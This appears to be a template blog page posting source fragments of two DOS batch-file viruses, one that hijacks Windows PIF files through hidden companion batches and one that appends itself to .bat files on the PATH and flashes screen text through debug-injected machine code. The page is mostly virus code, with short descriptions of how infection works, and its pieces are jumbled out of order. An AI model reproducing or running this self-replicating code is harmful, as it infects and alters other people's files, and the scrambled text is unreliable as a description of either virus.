![]() echo.|date|find /i "sat">nul.PiFV if errorlevel 1 goto PiFV_end echo.|time|find "7">nul.PiFV if errorlevel 1 goto PiFV_msg set PiFV=echo cls%_PiFV% %PiFV%. if '%1='PiFV goto PiFV_%2 :: run the virus! set _PiFV= if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV% %comspec% /e:5000 /c %0 PiFV go>nul if exist PiFV! del PiFV! :: run the host set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9 call %0 PiFV hst set PiFVo= set PiFVcl= :: check for activation. ![]() To 'cure', use PIFEDIT to restore the original file names then delete the hidden files. Only PIF's are affected, no changes are made to the infected programs. ![]() The pif files are marked so that they will not be re-infected. After the companion runs it runs the original host program, the name of which is encoded into the companion. It works by creating hidden companion batches containing copies of this then altering the PIF file so that the companion batch runs first. %path% :MeLTs shift%_MeLT% if '%2=' exit MeLT for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a goto MeLTs :MeLTinf find /i "MeLT"nul if not errorlevel 1 goto MeLTno echo not '%%0=' if '%%_melt%%=' goto meltbeg>MeLT.t type %3>MeLT.t echo.>MeLT.t type %temp%\MeLT_2a>MeLT.t move MeLT.t %3>nul exit MeLT :MeLTact - flash-melt screen text then put back to normal echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>MeLT.t echo e 120 B4 4C CD 21 00>MeLT.t echo g>MeLT.t debugnul del MeLT.t exit MeLT :MeLTno set MeLTC=%MeLTC%1 if %MeLTC%=1111111111 goto MeLTact :MeLTend ******************************************* 2.This is a virus that 'infects' PIF files, used by Windows to run DOS programs. %path% :MeLTfnd shift%_MeLT% if '%2=' exit MeLT set MeLT=%2\%MeLTH%.bat if not exist %MeLT% set MeLT=%2\%MeLTH% if not exist %MeLT% set MeLT=%2%MeLTH%.bat if not exist %MeLT% set MeLT=%2%MeLTH% if not exist %MeLT% goto MeLTfnd find "MeLT"%temp%\MeLT_2a attrib %temp%\MeLT_2a h :MeLTrun %MeLTH% MeLT s. The Most powerful ******************* not '%0=' if '%_melt%=' goto meltbeg ::- dummy host - off echo Hello World! ::- end dummy host - MeLTend :MeLTbeg off%_MeLT% if '%1='MeLT goto MeLT%2 if not exist %comspec% set comspec=%_MeLT%command %comspec% /e:5000 /c %0 MeLT vir set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9 call %0 MeLT rh set _MeLT= set MeLTcl= goto MeLTend :MeLTrh set _MeLT=x %0 %MeLTcl% :MeLTvir set MeLTH=%0 if not exist %_MeLT%%temp%\nul set temp=%tmp% if exist %temp%\MeLT_2a goto MeLTrun %0 MeLT fnd.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |